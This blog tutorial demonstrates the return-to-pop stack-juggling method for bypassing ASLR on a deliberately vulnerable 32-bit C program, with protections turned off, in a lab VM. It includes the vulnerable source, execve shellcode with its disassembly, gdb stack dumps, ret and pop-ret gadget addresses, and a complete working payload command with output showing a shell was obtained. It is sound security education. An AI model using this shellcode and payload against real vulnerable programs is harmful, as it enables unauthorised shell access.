Defeating ASLR: The Return-to-pop Method
30 Sep 2022
In this post, I would like to launch an attack on a 32-bit Ubuntu 20.04 system against a simple userspace program with buffer overflow vulnerability. The procedure presented here implements a stack juggling method called “return-to-pop
”1. The exploitation aims to bypass Address Space Layout Randomization (ASLR) (/proc/sys/kernel/randomize_va_space
defaults to “2
”, which means full randomization), and gains the shell access.
Table of Contents
The Vulnerable Program
The ans_check.c
program uses strcpy()
to load the user-specified string to a buffer with 34-byte capacity, and then compares it with “forty-two”:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_answer(char *ans) {
int ans_flag = 0;
char ans_buf[34];
printf("ans_buf is at address %p\n", &ans_buf);
strcpy(ans_buf, ans);
if (strcmp(ans_buf, "forty-two") == 0)
ans_flag = 1;
return ans_flag;
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <answer>\n", argv[0]);
exit(0);
}
if (check_answer(argv[1])) {
printf("Right answer!\n");
} else {
printf("Wrong answer!\n");
}
printf("About to exit!\n");
fflush(stdout);
/* system("/bin/sh"); // used for NX exploration */
}
Compile the program with the following options:
gcc -g -m32 -no-pie -z execstack -fno-stack-protector ans_check.c -o ans_check
We just turned off PIE, NX, and StackGuard protections while leaving ASLR enabled. If we run the program multiple times, we can see different start addresses of ans_buf
printed out. To construct an effective exploitation payload, we need to find a fixed memory address that the program can return to. Fortunately, the main()
function meets our need. To verify this, use this simple program find_main.c
:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
printf("%p\n", main);
return 0;
}
which gives the start address of main()
. Compile it with the command:
gcc -m32 -no-pie -o find_main find_main.c
After executing it several times, we should notice that the address does not change. On my system, the start address of main()
is 0x08049196
.
The Exploitation Payload
Our payload have three logical components: the first is a sequence of instructions (shellcode), by executing which we can obtain the shell; the second is safe padding with addresses than contain a ret
instruction; the third is the address of a pop-ret
instruction. In Kotlin’s words:
The purpose of
ret
will be somewhat similar to a NOP with a tweak, as eachret
performs apop
action and increase%esp
by four bytes, and then afterward jumps the next one.
If all our handcrafted instructions start at a four-byte aligned memory address, given the fact that strings in C language are NULL
terminated, the memory address immediately following our final pop-ret
instruction will be contaminated with a “\x00
” byte. The pop
instruction should be able to eliminate this address from the stack and let the last ret
jump to the potential return address which leads to our shellcode. Our ideal payload looks like this:
./ans_check $(perl -e 'print "\x90"xA, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "{&ret}"xB, "{&pop-ret}"')
where the value of B
is determined by the offset between the start address of ans_buf
and the address we are returning to, and the value of A
is chosen to fit a byte-alignment.
What role does the first component (shellcode) play here? If we compile it using the -m i386
option and dump the assembly code, we may get:
31 c0 xor %eax,%eax
50 push %eax
68 2f 2f 73 68 push 0x68732f2f
68 2f 62 69 6e push 0x6e69622f
89 e3 mov %ebx,%esp
50 push %eax
89 e2 mov %edx,%esp
53 push %ebx
89 e1 mov %ecx,%esp
b0 0b mov %al,$0xb
cd 80 int 0x80
The first line sets %eax
to zero and then the second line pushes it onto the stack. The hexadecimal value \x2f\x2f\x68\x73
is actually the string “//sh
” and The hexadecimal value \x2f\x62\x69\x6e
is actually the string “/bin
”. The first five lines combined let %ebx
point to the head of a NULL
terinated string, “/bin//sh\0
”. Note that the struction mov %al,$0xb
sets the lower eight bits of the %eax
register. “11” is the syscall number of execve()
. Thus, the shellcode will be run as a call to execve("/bin//sh")
.
Find the Offset
A pointer to our input string is passed to the function check_answer
, which means that the address of our input string is put on the stack before the function check_answer
is called. Issuing the command:
objdump -D ans_check | less
we may find three consecutive instructions that push our input string onto the stack, call the function check_answer
, and the following instruction which is the return address that will be pushed onto the stack as the call instruction is executed:
80492f6: 50 push %eax
80492f7: e8 3a ff ff ff call 8049236 <check_answer>
80492fc: 83 c4 10 add $0x10,%esp
Use the following commands to examine the stack. The breakpoint being set in gdb
should be at the call to strcpy()
:
$ gdb -q ans_check
(gdb) break 12
(gdb) run test
(gdb) x/72xw $esp
This is what I got:
gdb-peda$ break 12
Breakpoint 1 at 0x8049269: file ans_check.c, line 12.
gdb-peda$ run test
Starting program: /home/seed/Documents/return2x/ans_check test
ans_buf is at address 0xffffd58a
[----------------------------------registers-----------------------------------]
EAX: 0x21 ('!')
EBX: 0x804c000 --> 0x804bf10 --> 0x1
ECX: 0x0
EDX: 0x804a021 --> 0x726f6600 ('')
ESI: 0xf7faa000 --> 0x1e7d6c
EDI: 0xf7faa000 --> 0x1e7d6c
EBP: 0xffffd5b8 --> 0xffffd5d8 --> 0x0
ESP: 0xffffd580 --> 0x0
EIP: 0x8049269 (<check_answer+51>: sub esp,0x8)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8049260 <check_answer+42>: push eax
0x8049261 <check_answer+43>: call 0x80490c0 <printf@plt>
0x8049266 <check_answer+48>: add esp,0x10
=> 0x8049269 <check_answer+51>: sub esp,0x8
0x804926c <check_answer+54>: push DWORD PTR [ebp+0x8]
0x804926f <check_answer+57>: lea eax,[ebp-0x2e]
0x8049272 <check_answer+60>: push eax
0x8049273 <check_answer+61>: call 0x80490e0 <strcpy@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd580 --> 0x0
0004| 0xffffd584 --> 0x534
0008| 0xffffd588 --> 0x55 ('U')
0012| 0xffffd58c --> 0xf7fa8224 --> 0xf7f31e90 --> 0xfb1e0ff3
0016| 0xffffd590 --> 0x0
0020| 0xffffd594 --> 0xf7faa000 --> 0x1e7d6c
0024| 0xffffd598 --> 0xf7ffc7e0 --> 0x0
0028| 0xffffd59c --> 0xf7fad4e8 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, check_answer (ans=0xffffd7f5 "test") at ans_check.c:12
12 strcpy(ans_buf, ans);
gdb-peda$ x/72xw $esp
0xffffd580: 0x00000000 0x00000534 0x00000055 0xf7fa8224
0xffffd590: 0x00000000 0xf7faa000 0xf7ffc7e0 0xf7fad4e8
0xffffd5a0: 0xf7faa000 0xf7fe22d0 0x00000000 0x00000000
0xffffd5b0: 0xf7faa3fc 0x0804c000 0xffffd5d8 0x080492fc
0xffffd5c0: 0xffffd7f5 0xffffd684 0xffffd690 0x080492bc
0xffffd5d0: 0xffffd5f0 0x00000000 0x00000000 0xf7ddcee5
0xffffd5e0: 0xf7faa000 0xf7faa000 0x00000000 0xf7ddcee5
0xffffd5f0: 0x00000002 0xffffd684 0xffffd690 0xffffd614
0xffffd600: 0xf7faa000 0x00000000 0xffffd668 0x00000000
0xffffd610: 0xf7ffd000 0x00000000 0xf7faa000 0xf7faa000
0xffffd620: 0x00000000 0x8337981a 0xc7013e0a 0x00000000
0xffffd630: 0x00000000 0x00000000 0x00000002 0x08049120
0xffffd640: 0x00000000 0xf7fe7ad4 0xf7fe22d0 0x0804c000
0xffffd650: 0x00000002 0x08049120 0x00000000 0x08049156
0xffffd660: 0x080492a4 0x00000002 0xffffd684 0x08049360
0xffffd670: 0x080493d0 0xf7fe22d0 0xffffd67c 0x0000001c
0xffffd680: 0x00000002 0xffffd7cc 0xffffd7f5 0x00000000
0xffffd690: 0xffffd7fa 0xffffd80a 0xffffd818 0xffffd836
There are several addresses we are particularly insterested in:
0xffffd580: 0x00000000 0x00000534 0x00000055 0xf7fa8224 (ans_buf start address)
0xffffd590: 0x00000000 0xf7faa000 0xf7ffc7e0 0xf7fad4e8
0xffffd5a0: 0xf7faa000 0xf7fe22d0 0x00000000 0x00000000
0xffffd5b0: 0xf7faa3fc 0x0804c000 0xffffd5d8 0x080492fc (return address for check_answer)
0xffffd5c0: 0xffffd7f5 0xffffd684 0xffffd690 0x080492bc (first argument of check_answer)
......
0xffffd680: 0x00000002 0xffffd7cc 0xffffd7f5 0x00000000 (higher address of our input string)
......
0xffffd7f0: 0x366b6365 0x73657400 0x48530074 0x3d4c4c45 ("test")
We should notice that the offset between the start address of ans_buf
and the higher address of our input string “test” (inside the stack frame of main()
) is 0xffffd688 - 0xffffd58a = 0xfe = 254
bytes.
Construct the Payload
Next, let’s find out the addresses of ret
and pop-ret
using objdump
:
804935d: c3 ret
$ objdump -D ans_check | grep -B3 ret | grep -A1 pop
8049022: 5b pop %ebx
8049023: c3 ret
--
8049358: 5b pop %ebx
8049359: 5d pop %ebp
804935a: 8d 61 fc lea -0x4(%ecx),%esp
--
80493c1: 5e pop %esi
80493c2: 5f pop %edi
80493c3: 5d pop %ebp
80493c4: c3 ret
--
80493f2: 5b pop %ebx
80493f3: c3 ret
We shall choose one pop
instruction that uses %ebx
; popping to other registers like %edi
or %ebp
can have other effects.
Now, we have already obtained the addresses of ret
instruction as well as the pop-ret
instruction. We would like the length of our payload to be $250$ bytes so that the address four-byte ahead of the address of the input string in main()
can be overwritten by the address of the pop-ret
instruction. Moreover, since we want our exploit to be executed at a four-byte aligned memory address and the buffer start at the middle of a four-byte memory address, we need another 2 bytes of NOPS padded in our payload. The constructed payload is shown below:
$ ./ans_check $(perl -e 'print "\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "\x5d\x93\x04\x08"x54, "\x22\x90\x04\x08"')
It successfully obtain the shell:
$ ./ans_check $(perl -e 'print "\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "\x5d\x93\x04\x08"x54, "\x22\x90\x04\x08"')
ans_buf is at address 0xffe7f4da
$ whoami
seed
$ id
uid=1001(seed) gid=1001(seed) groups=1001(seed),120(docker)
Actually, our exploit also works if the five bytes of NOPS are padded between the shellcode and the address of ret
:
$ ./ans_check $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x5, "\x5d\x93\x04\x08"x54, "\x22\x90\x04\x08"')
ans_buf is at address 0xffe2999a
$ whoami
seed
$ id
uid=1001(seed) gid=1001(seed) groups=1001(seed),120(docker)
Notes
-
See Izik Kotler, “Smack the Stack (Advanced Buffer Overflow Methods)”, In Proceedings of 22C3, 2005. ⤴